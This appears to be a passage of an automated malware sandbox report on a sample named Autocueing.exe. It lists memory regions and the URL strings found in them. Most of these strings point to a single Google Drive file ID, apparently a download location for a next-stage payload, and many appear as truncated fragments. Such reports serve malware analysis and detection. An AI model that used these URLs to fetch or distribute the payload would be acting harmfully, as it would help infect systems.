      Source: Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
      Source: Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830392198.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i$
      Source: Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/mPqiekafjqjNlgzAtvpzw_A7pqv34
      Source: Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/p
      Source: Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/trolno-cache
      Source: Autocueing.exe, 00000008.00000003.2635296609.0000000003440000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3393677766.000000000019B000.00000004.00000010.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv347J
      Source: Autocueing.exe, 00000008.00000003.2635296609.0000000003440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34A
      Source: Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34P
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34SH
      Source: Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34zAtvpzw_A7pqv34
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/wnload
      Source: Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/x
      Source: Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/xpiresSun
      Source: Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334572115.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312825589.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/~XN
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userco
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString 
found in binary or memory: https://drive.usercontent.go
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
      Source: Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloader
      Source: Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadi9
      Source: Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadic
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, 
Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadid
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadis
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, 
Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadl
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadnK
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, 
Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadom
      Source: Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadoo
      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3136123204.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3135380542.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3182811158.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadt
      Source: Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloaduf
      Source: Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloady
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadz5
      Source: Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download~9
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzKd
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzOe
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekap
      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekat
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&e
      Source: Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&eh
